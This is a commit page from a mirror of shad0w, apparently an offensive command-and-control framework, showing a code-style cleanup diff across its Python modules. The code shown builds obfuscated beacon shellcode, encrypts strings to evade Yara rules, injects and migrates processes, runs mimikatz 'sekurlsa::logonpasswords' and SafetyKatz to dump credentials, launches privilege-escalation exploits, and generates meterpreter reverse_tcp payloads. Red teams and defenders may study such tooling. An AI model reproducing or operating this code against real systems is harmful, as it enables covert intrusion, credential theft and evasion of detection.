Mirrors
/
shad0w
mirror of https://github.com/bats3c/shad0w
6
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

tidy code up

This commit is contained in:
L1ghtn1ng 2021-01-18 22:22:15 +00:00
parent afede223b5
commit 4890df575c
54 changed files with 344 additions and 171 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
lib/ShellcodeRDI.py
View File

@ -7,8 +7,9 @@ if sys.version_info < (3,0):
import struct
from struct import pack
MACHINE_IA64=512
MACHINE_AMD64=34404
MACHINE_IA64 = 512
MACHINE_AMD64 = 34404
def is64BitDLL(bytes):
header_offset = struct.unpack("<L", bytes[60:64])[0]
@ -16,16 +17,18 @@ def is64BitDLL(bytes):
if machine == MACHINE_IA64 or machine == MACHINE_AMD64:
return True
return False
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
def HashFunctionName(name, module = None):
def HashFunctionName(name, module=None):
function = name.encode() + b'\x00'
if(module):
if module:
module = module.upper().encode('UTF-16LE') + b'\x00\x00'
functionHash = 0
@ -53,6 +56,7 @@ def HashFunctionName(name, module = None):
return functionHash
def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
#MARKER:S
@ -139,7 +143,8 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
# User data
return bootstrap + rdiShellcode + dllBytes + userData
else: # 32 bit
else:
# 32 bit
rdiShellcode = rdiShellcode32
bootstrap = b''

10
lib/auxiliary.py
View File

@ -1,17 +1,20 @@
import string
import random
def gen_rand_filename():
name = ""
for i in range(1, 10):
name += random.choice(list(string.ascii_uppercase + string.ascii_lowercase))
return name
def get_size(filename):
with open(filename, "rb") as file:
length = len(file.read())
return length
def clean_hex_output(hex_bytes):
raw_crypt_bytes = b""
for byte in hex_bytes.split():
@ -25,17 +28,20 @@ def clean_hex_output(hex_bytes):
raw_crypt_bytes += bytes.fromhex(byte)
return raw_crypt_bytes
def prepare_pe_image(bytes_len, data):
pe_image = f"#define array_len {bytes_len}\n\n"
pe_image = f"#define array_len {bytes_len}\n\n"
pe_image += "unsigned long long image_crypt[] = {\n"
pe_image += data
pe_image += "\n};"
return pe_image
def write_pe_image(path, pe_image):
with open(path, "w") as file:
file.write(pe_image)
def write_header_file(path, keys_used, jmp=False, runpe=False):
headerfile = ""
with open(path, "w") as file:
@ -48,6 +54,7 @@ def write_header_file(path, keys_used, jmp=False, runpe=False):
headerfile += "void RunFromMemory(char* pImage, char* pPath);\n"
file.write(headerfile)
def write_decrypt(path, loops, enc_type="xor"):
first_run = False
to_write = ""
@ -88,6 +95,7 @@ def write_decrypt(path, loops, enc_type="xor"):
return safe
def clean_up(path, clean):
with open(path, "w") as file:
file.write(clean)

3
lib/banner.py
View File

@ -1,5 +1,6 @@
import random
class Banner(object):
def __init__(self):
super(Banner, self).__init__()
@ -103,4 +104,4 @@ class Banner(object):
'''` ";;;.
"""
self.banners = [banner4, banner1, banner2, banner3]
self.banners = [banner4, banner1, banner2, banner3]

17
lib/buildtools.py
View File

@ -19,6 +19,7 @@ static_warning = """Static payloads can be very large and much easier to detect.
exploits, etc, staged payloads are recommended as they are much smaller and easier to use.
"""
def clone_source_files(rootdir="src", builddir="build", basedir="/root/shad0w/beacon", asm=False, backmake=False):
# move the source files of the beacon over to the build directory
@ -36,6 +37,7 @@ def clone_source_files(rootdir="src", builddir="build", basedir="/root/shad0w/be
return
def update_settings_file(shad0wbuild, custom_template=None, custom_path=None):
# update the settings so that when we build, we will use our new args
@ -63,6 +65,7 @@ def update_settings_file(shad0wbuild, custom_template=None, custom_path=None):
return
def _crypt_string(raw_string, key):
# xor encrypt a string with a provided key
crypt_string = ""
@ -71,10 +74,12 @@ def _crypt_string(raw_string, key):
return base64.b64encode(crypt_string.encode())
def _gen_key(name):
key = hex(random.randint(0, 100))
return f"#define {name}_KEY {key}", key
def _crypt_strings():
# encrypt strings so they are not hanging around in the binary waiting to be
# thrown into a Yara rule. This is obfuscation not encryption
@ -103,7 +108,6 @@ def _crypt_strings():
return
def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=None, modlocation="/root/shad0w/beacon/beacon.exe", debug=False, make_target=None):
# build the beacon from the source files, making sure to
# obey the correct payload settings that we have been given
@ -121,7 +125,8 @@ def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=N
# remove the old file
try:
os.unlink(modlocation)
except: pass
except:
pass
# make sure we in the correct build dir
os.chdir(builddir)
@ -161,6 +166,7 @@ def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=N
return True
def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=False, donut=True, srdi=False):
# use Donut or srdi to extract the shellcode from our newly created beacon
@ -192,6 +198,7 @@ def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=
return code
def write_and_bridge(filename, rcode, noremove=False):
# write the supplied code to the file given
# by the user and then make sure they can access it
@ -210,6 +217,7 @@ def write_and_bridge(filename, rcode, noremove=False):
return len(rcode)
def raise_issue_payload(string):
# throw an error with the payload string
@ -218,6 +226,7 @@ def raise_issue_payload(string):
# exit with error code
exit(-1)
def get_payload_variables(payload_string, warn=True):
global secure_warning, static_warning
@ -271,6 +280,7 @@ def get_payload_variables(payload_string, warn=True):
# return our generated args
return arch, platform, secure, static
def elevate_auto_build(rootdir=None, template=None, arch=None, check=False, exploit=False):
# make the build process quicker for modules
@ -304,6 +314,7 @@ def elevate_auto_build(rootdir=None, template=None, arch=None, check=False, expl
# give the shellcode back
return rcode
def shellcode_to_array(data):
length = 0
line_len = 0
@ -389,6 +400,7 @@ def elevate_build_stage(shad0w, rootdir=None, os=None, arch=None, secure=None, f
with open(stagefile, "w+") as file:
file.write(stage_template)
def _random_string(length):
rstring = ""
alphabet = string.ascii_lowercase + string.ascii_uppercase
@ -398,6 +410,7 @@ def _random_string(length):
return rstring
def shrink_exe(name):
os.system(f"strip {name} 1>/dev/null 2>&1")
os.system(f"upx --brute {name} 1>/dev/null 2>&1")

1
lib/cmd.py
View File

@ -5,6 +5,7 @@ from pygments.lexer import Lexer, RegexLexer, do_insertions, bygroups, \
from pygments.token import Punctuation, \
Text, Comment, Operator, Keyword, Name, String, Number, Generic
class Shad0wLexer(RegexLexer):
name = 'shad0w'
aliases = ['shad0w']

1
lib/commands/back.py
View File

@ -2,6 +2,7 @@ __description__ = "Go back to the initial shell"
__author__ = "@HashtagMarkus"
__type__ = "beacon"
def main(shad0w, args):
# check we actually have a beacon

14
lib/commands/beacons.py
View File

@ -8,6 +8,7 @@ __description__ = "Interact with or display current beacons"
__author__ = "@_batsec_"
__type__ = "beacon"
def _list_beacons(shad0w):
# I have gcse english, I gonna use it
if shad0w.beacon_count == 1:
@ -22,15 +23,15 @@ def _list_beacons(shad0w):
# stuff we will display
# beacon number
num = shad0w.beacons[beacon]["num"]
num = shad0w.beacons[beacon]["num"]
# get last check in time
checkin = shad0w.beacons[beacon]["last_checkin"]
checkin = shad0w.beacons[beacon]["last_checkin"]
# stuff to format for name
domain = shad0w.beacons[beacon]["domain"]
username = shad0w.beacons[beacon]["username"]
machine = shad0w.beacons[beacon]["machine"]
domain = shad0w.beacons[beacon]["domain"]
username = shad0w.beacons[beacon]["username"]
machine = shad0w.beacons[beacon]["machine"]
# format of name
if domain != "NULL":
@ -44,7 +45,6 @@ def _list_beacons(shad0w):
print(t)
return
def _interact_beacon(shad0w, args):
# get beacon number
@ -54,7 +54,7 @@ def _interact_beacon(shad0w, args):
try:
interact_with = int(interact_with)
except ValueError:
shad0w.debug.log(f"'{interact_with}' is an invaild beacon", log=True)
shad0w.debug.log(f"'{interact_with}' is an invalid beacon", log=True)
return
# match the beacon number to the id and then set the current id as that

4
lib/commands/binject.py
View File

@ -41,13 +41,13 @@ def generate_beacon_code(shad0w, beacon):
buildtools.update_settings_file(None, custom_template=settings_template)
if beacon is None:
os = shad0w.beacons[shad0w.current_beacon]["os"]
os_ = shad0w.beacons[shad0w.current_beacon]["os"]
arch = shad0w.beacons[shad0w.current_beacon]["arch"]
secure = shad0w.beacons[shad0w.current_beacon]["secure"]
else:
arch, arch, secure, _ = buildtools.get_payload_variables(beacon)
buildtools.make_in_clone(arch=arch, platform=os, secure=secure, static=True)
buildtools.make_in_clone(arch=arch, platform=os_, secure=secure, static=True)
return buildtools.extract_shellcode()

10
lib/commands/cat.py
View File

@ -11,7 +11,7 @@ __description__ = "Show the contents of a file on a target"
__author__ = "@_batsec_"
__type__ = "file system"
EXEC_ID = 0x4000
EXEC_ID = 0x4000
OPCODE_LS = 0x2000
ERROR = False
@ -23,22 +23,24 @@ def error(message):
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def cat_callback(shad0w, data):
shad0w.debug.log(data, log=True, pre=False)
return ""
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon.")
return
# usage examples
usage_examples = """
Don't try to cat binary files, it doesnt work very well.
@ -82,4 +84,4 @@ cat C:\\Users\\thejoker\\Desktop\\evil_plans.txt
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = cat_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)

17
lib/commands/cd.py
View File

@ -9,21 +9,23 @@ __description__ = "Change the working directory on a target"
__author__ = "@_batsec_"
__type__ = "file system"
EXEC_ID = 0x4000
EXEC_ID = 0x4000
OPCODE_CD = 0x6000
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
if message is not None:
print(message)
def get_list_directory(rargs, args):
# resolve the directory we need to list
@ -46,6 +48,7 @@ def cd_callback(shad0w, data):
return ""
def main(shad0w, args):
# save the raw args
@ -64,11 +67,11 @@ Examples:
cd C:\\
cd "C:\\Documents and Settings"
"""
parse = argparse.ArgumentParser(prog='ls',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
@ -97,4 +100,4 @@ cd "C:\\Documents and Settings"
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = cd_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)

4
lib/commands/die.py
View File

@ -15,16 +15,18 @@ DIE_ID = 0x6000
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def main(shad0w, args):
# check we actually have a beacon

4
lib/commands/dotnet.py
View File

@ -10,6 +10,7 @@ __type__ = "enumeration"
EXEC_ID = 0x3000
def format_data(shad0w, data):
data = data.splitlines()
@ -25,6 +26,7 @@ def format_data(shad0w, data):
if "v" in line:
shad0w.debug.log(f"-\t{line}", log=True, pre=False)
def dotnet_callback(shad0w, data):
# well its kind of true
if "v" not in data:
@ -60,4 +62,4 @@ def main(shad0w, args):
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = dotnet_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)

34
lib/commands/download.py
View File

@ -21,15 +21,17 @@ error_list = ""
# name of the file to download
FILE_TO_DOWNLOAD = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
if message is not None:
print(message)
def download_callback(shad0w, data):
global FILE_TO_DOWNLOAD
@ -74,8 +76,8 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
# init the parser
parse = argparse.ArgumentParser(prog='download',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
@ -89,10 +91,10 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
args = parse.parse_args(args[1:])
except:
pass
# we need a file to read so if we don't then fail
if len(args.file) == 0:
print(error_list)
print(error_list)
parse.print_help()
return
@ -101,10 +103,10 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
# change to the dir of the folder mapped to the users current dir
os.chdir("/root/shad0w/.bridge")
# make this variable global so the call back can access it
FILE_TO_DOWNLOAD = args.file
# change back to our dir
os.chdir(shad0w_cwd)
@ -112,7 +114,8 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
read_file = ' '.join(args.file).replace('\\', "\\\\").replace('"', '')
# clone all the source files
buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/download/", builddir="/root/shad0w/modules/windows/download/build")
buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/download/",
builddir="/root/shad0w/modules/windows/download/build")
# set the correct settings
template = """#define _C2_CALLBACK_ADDRESS L"%s"
@ -125,14 +128,17 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
#define DO_CALLBACK 0x4000
#define FILENAME "%s" """ % (shad0w.endpoint, shad0w.addr[1], shad0w.current_beacon, read_file)
buildtools.update_settings_file(None, custom_template=template, custom_path="/root/shad0w/modules/windows/download/build/settings.h")
buildtools.update_settings_file(None, custom_template=template,
custom_path="/root/shad0w/modules/windows/download/build/settings.h")
# compile the module
buildtools.make_in_clone(builddir="/root/shad0w/modules/windows/download/build", modlocation="/root/shad0w/modules/windows/download/module.exe", arch="x64")
buildtools.make_in_clone(builddir="/root/shad0w/modules/windows/download/build",
modlocation="/root/shad0w/modules/windows/download/module.exe", arch="x64")
# get the shellcode from the module
rcode = buildtools.extract_shellcode(beacon_file="/root/shad0w/modules/windows/download/module.exe", want_base64=True)
rcode = buildtools.extract_shellcode(beacon_file="/root/shad0w/modules/windows/download/module.exe",
want_base64=True)
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = download_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)

24
lib/commands/elevate.py
View File

@ -18,15 +18,17 @@ ERROR = False
error_list = ""
RAN_COMMAND = False
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
if message is not None:
print(message)
def list_exploits(shad0w):
sys.path.append("/root/shad0w/exploits/")
@ -42,6 +44,7 @@ def list_exploits(shad0w):
print(t)
def show_details(shad0w, name):
sys.path.append("/root/shad0w/exploits/")
all_exploits = importlib.import_module("__init__").__all__
@ -56,8 +59,11 @@ def show_details(shad0w, name):
arch = importlib.import_module(exploit.replace("/", ".")).__description__["Arch"]
secure = importlib.import_module(exploit.replace("/", ".")).__description__["Secure"]
if secure: secure = "Yes"
else: secure = "No"
if secure:
secure = "Yes"
else:
secure = "No"
shad0w.debug.log("Exploit details:\n", log=True)
shad0w.debug.log(f"Name: {exploit_name}", log=True, pre=False)
@ -68,6 +74,7 @@ def show_details(shad0w, name):
shad0w.debug.log(f"Arch: {arch}", log=True, pre=False)
shad0w.debug.log(f"Supports Secure: {secure}", log=True, pre=False)
def check_exploit(shad0w, name, arch):
# run the exploit in check mode
@ -79,6 +86,7 @@ def check_exploit(shad0w, name, arch):
if name == exploit_name:
importlib.import_module(exploit.replace("/", ".")).check(shad0w, arch)
def use_exploit(shad0w, name, arch):
# run the exploit in exploit mode
@ -91,6 +99,7 @@ def use_exploit(shad0w, name, arch):
exploit_mod = importlib.import_module(exploit.replace("/", "."))
threading.Thread(target=exploit_mod.exploit, args=(shad0w, arch)).start()
def main(shad0w, args):
global RAN_COMMAND
@ -113,8 +122,8 @@ elevate --smart
# init the parser
parse = argparse.ArgumentParser(prog='elevate',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
@ -163,4 +172,3 @@ elevate --smart
if RAN_COMMAND == False:
parse.print_help()
return

5
lib/commands/exit.py
View File

@ -2,12 +2,13 @@
# exit shad0w
#
import os, signal
import sys
__description__ = "Exit shad0w C2"
__author__ = "@_batsec_"
__type__ = "system"
def main(shad0w, args):
# Once we have logging we will probably want to make a more sophisticated exit routine
os.sys.exit(0)
sys.exit(0)

6
lib/commands/getpid.py
View File

@ -8,14 +8,16 @@ __description__ = "Show current process info"
__author__ = "@_batsec_"
__type__ = "process"
EXEC_ID = 0x4000
EXEC_ID = 0x4000
OPCODE_PID = 0x7000
def pid_callback(shad0w, data):
shad0w.debug.log(data, log=True, pre=False)
return ""
def main(shad0w, args):
# check we actually have a beacon
@ -29,4 +31,4 @@ def main(shad0w, args):
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = pid_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)

5
lib/commands/gitl.py
View File

@ -25,17 +25,18 @@ RUBEUS_BIN = "/root/shad0w/bin/gitl.x64.exe"
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def ghostinthelogs_callback(shad0w, data):
data = data.replace("[+]", "\033[1;32m[+]\033[0m")
data = data.replace("[!]", "\033[1;31m[!]\033[0m")
@ -47,6 +48,7 @@ def ghostinthelogs_callback(shad0w, data):
return ""
def set_and_send(shad0w, args):
args.cls = False
args.method = False
@ -65,6 +67,7 @@ def set_and_send(shad0w, args):
return
def main(shad0w, args):
raw_args = args

4
lib/commands/help.py
View File

@ -10,6 +10,7 @@ __description__ = "Show help information"
__author__ = "@_batsec_"
__type__ = "system"
def usage(shad0w):
t = PrettyTable(["Type", "Command", "Description"])
@ -28,7 +29,7 @@ def usage(shad0w):
try:
description = mod.__description__
except:
except Exception:
description = "No description available."
t.add_row([type, command, description])
@ -37,6 +38,7 @@ def usage(shad0w):
return t
def main(shad0w, args):
info = usage(shad0w)
shad0w.debug.log(info, pre=False, log=True)

5
lib/commands/lockless.py
View File

@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
# location of lockless binary
LOCKLESS_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/LockLess.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def lockless_callback(shad0w, data):
print(data)
return ""
def main(shad0w, args):
# check we actually have a beacon

13
lib/commands/ls.py
View File

@ -15,16 +15,18 @@ OPCODE_LS = 0x1000
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def get_list_directory(rargs, args):
# resolve the directory we need to list
@ -46,6 +48,7 @@ def ls_callback(shad0w, data):
return ""
def main(shad0w, args):
# save the raw args
@ -67,9 +70,9 @@ ls "C:\\Documents and Settings"
"""
parse = argparse.ArgumentParser(prog='ls',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
@ -99,4 +102,4 @@ ls "C:\\Documents and Settings"
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = ls_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)

14
lib/commands/meterpreter.py
View File

@ -12,19 +12,19 @@ __type__ = "module"
EXEC_ID = 0x3000
class DummyClass(object):
def __init__(self):
pass
# Let argparse error and exit nice
def error(message):
#global ERROR, error_list
#ERROR = True
print(f"\033[0;31m{message}\033[0m\n")
def exit(status=0, message=None):
if message != None: print(message)
return
if message is not None:
print(message)
def msfvenom_payload_gen(shad0w, payload, lport, lhost, arch):
@ -66,7 +66,7 @@ def main(shad0w, args):
# Setup the args, set default='' to show help message when missing
parser.add_argument("--port", required=True, help="Port you would like Metasploit to call")
parser.add_argument("--host", required=True, help="Host/IP you would like Metasploit to call")
parser.add_argument("--payload", help="What Metasploit payload you would like to deploy, default: windows/x64/meterpreter/reverse_tcp",required=False, default="windows/x64/meterpreter/reverse_tcp")
parser.add_argument("--payload", help="What Metasploit payload you would like to deploy, default: windows/x64/meterpreter/reverse_tcp", required=False, default="windows/x64/meterpreter/reverse_tcp")
# Make sure we don't die from weird args
try:
@ -85,7 +85,7 @@ def main(shad0w, args):
return
# Generate and read the msfvenom shellcode
rcode = msfvenom_payload_gen(shad0w, payload = args.payload, lport = args.port, lhost = args.host, arch="x64")
rcode = msfvenom_payload_gen(shad0w, payload=args.payload, lport=args.port, lhost=args.host, arch="x64")
# Set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)

17
lib/commands/migrate.py
View File

@ -21,15 +21,17 @@ DLLINJECT_EXEC_ID = 0x5000
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
if message is not None:
print(message)
def build_inject_info(args, rcode):
@ -43,6 +45,7 @@ def build_inject_info(args, rcode):
return json.dumps(info)
def generate_beacon_code(shad0w):
buildtools.clone_source_files(rootdir='injectable')
@ -63,6 +66,7 @@ def generate_beacon_code(shad0w):
return buildtools.extract_shellcode()
def format_shellcode(shellcode):
hshellcode = ""
@ -76,6 +80,7 @@ def format_shellcode(shellcode):
return hshellcode
def write_header(code, file_loc):
hex_code = format_shellcode(code)
@ -90,12 +95,14 @@ unsigned int beacon_bin_len = %s;
return
def get_dll_data(file_loc):
with open(file_loc, "rb") as file:
data = file.read()
return base64.b64encode(data).decode()
def generate_beacon_dll(shad0w, rcode):
# write header file
write_header(rcode, "/root/shad0w/modules/windows/shinject/beacon.h")
@ -105,13 +112,14 @@ def generate_beacon_dll(shad0w, rcode):
made = buildtools.make_in_clone(modlocation="/root/shad0w/modules/windows/shinject/module.dll", builddir=os.getcwd(), make_target="x64")
# check that the dll has built
if made != True:
if made is not True:
shad0w.debug.error("Error building migrate dll.")
return
# return the base64 dll data
return get_dll_data("/root/shad0w/modules/windows/shinject/module.dll")
def await_impersonate(shad0w, pid):
while True:
if shad0w.beacons[shad0w.current_beacon]["impersonate"] == None:
@ -128,6 +136,7 @@ def await_impersonate(shad0w, pid):
shad0w.debug.good(f"Successfully migrated ({pid})")
return
def main(shad0w, args):
# check we actually have a beacon

6
lib/commands/mimikatz.py
View File

@ -20,17 +20,18 @@ MIMIKATZ_BIN = "/root/shad0w/bin/mimikatz.x64.exe"
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def mimikatz_callback(shad0w, data):
data = data.replace(".#####.", "\033[1;32m.#####.\033[0m")
data = data.replace(".## ^ ##.", "\033[1;32m.##\033[0m \033[1;39m^\033[0m \033[1;32m##.\033[0m")
@ -43,6 +44,7 @@ def mimikatz_callback(shad0w, data):
return ""
def main(shad0w, args):
# check we actually have a beacon
@ -101,4 +103,4 @@ mimikatz -x sekurlsa::logonpasswords
b64_comp_data = shellcode.generate(MIMIKATZ_BIN, args, params)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = mimikatz_callback
shad0w.beacons[shad0w.current_beacon]["callback"] = mimikatz_callback

8
lib/commands/mkdir.py
View File

@ -9,7 +9,7 @@ __description__ = "Create a new directory on a target"
__author__ = "@_batsec_"
__type__ = "file system"
EXEC_ID = 0x4000
EXEC_ID = 0x4000
OPCODE_MKDIR = 0x5000
ERROR = False
@ -21,9 +21,11 @@ def error(message):
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
if message is not None:
print(message)
def mkdir_callback(shad0w, data):
shad0w.debug.log(data, log=True, pre=False)

6
lib/commands/ps.py
View File

@ -9,14 +9,16 @@ __description__ = "Show running processes"
__author__ = "@_batsec_"
__type__ = "process"
EXEC_ID = 0x4000
EXEC_ID = 0x4000
OPCODE_PID = 0x8000
def ps_callback(shad0w, data):
sys.stdout.write(data)
return ""
def main(shad0w, args):
# check we actually have a beacon
@ -30,4 +32,4 @@ def main(shad0w, args):
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = ps_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)

13
lib/commands/psh.py
View File

@ -28,21 +28,24 @@ error_list = ""
# make the command output a bit cleaner
FIRST_OUTPUT = True
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def psh_callback(shad0w, data):
global FIRST_OUTPUT
@ -59,9 +62,11 @@ def psh_callback(shad0w, data):
return ""
def encode_string(data):
return base64.b64encode(data.encode())
def random_string():
rstring = ""
alphabet = string.ascii_lowercase + string.ascii_uppercase
@ -71,10 +76,12 @@ def random_string():
return rstring
def do_copy():
os.system("cp /root/shad0w/modules/windows/psh/*.cs /root/shad0w/modules/windows/psh/build")
os.system("cp /root/shad0w/modules/windows/psh/*.dll /root/shad0w/modules/windows/psh/build")
def write_args(pwsh):
do_copy()
@ -90,6 +97,7 @@ def write_args(pwsh):
with open("/root/shad0w/modules/windows/psh/build/main.cs", "w") as file:
file.write(new_file)
def compile_binary():
cwd = os.getcwd()
@ -97,6 +105,7 @@ def compile_binary():
os.system("mcs /reference:System.Management.Automation.dll -out:psh.exe main.cs")
os.chdir(cwd)
def main(shad0w, args):
raw_args = args

6
lib/commands/pwd.py
View File

@ -7,14 +7,16 @@ __description__ = "Show the current working directory on a target"
__author__ = "@_batsec_"
__type__ = "file system"
EXEC_ID = 0x4000
EXEC_ID = 0x4000
OPCODE_PWD = 0x3000
def pwd_callback(shad0w, data):
shad0w.debug.log(data, log=True, pre=False)
return ""
def main(shad0w, args):
# check we actually have a beacon
@ -28,4 +30,4 @@ def main(shad0w, args):
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = pwd_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)

13
lib/commands/rm.py
View File

@ -15,21 +15,24 @@ OPCODE_RM = 0x4000
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def rm_callback(shad0w, data):
shad0w.debug.log(data, log=True, pre=False)
return ""
def main(shad0w, args):
# save the raw args
@ -48,9 +51,9 @@ rm "C:\\Users\\thejoker\\deleteme.txt"
"""
parse = argparse.ArgumentParser(prog='rm',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
@ -77,4 +80,4 @@ rm "C:\\Users\\thejoker\\deleteme.txt"
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = rm_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)

5
lib/commands/safetykatz.py
View File

@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
# location of safetykatz binary
SAFETYKATZ_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SafetyKatz.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def safetykatz_callback(shad0w, data):
print(data)
return ""
def main(shad0w, args):
# check we actually have a beacon

6
lib/commands/seatbelt.py
View File

@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
# location of seatbelt binary
SEATBELT_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/Seatbelt.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def seatbelt_callback(shad0w, data):
print(data)
return ""
def usage():
help_stuff = """
%&&@@@&&
@ -206,6 +209,7 @@ def usage():
"""
print(help_stuff)
def main(shad0w, args):
# check we actually have a beacon

6
lib/commands/set.py
View File

@ -10,16 +10,18 @@ __type__ = "beacon"
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def main(shad0w, args):
global ERROR
@ -77,4 +79,4 @@ set -v MsfStageSize -d 14
shad0w.debug.error("Key Error")
return
return
return

6
lib/commands/sharpchrome.py
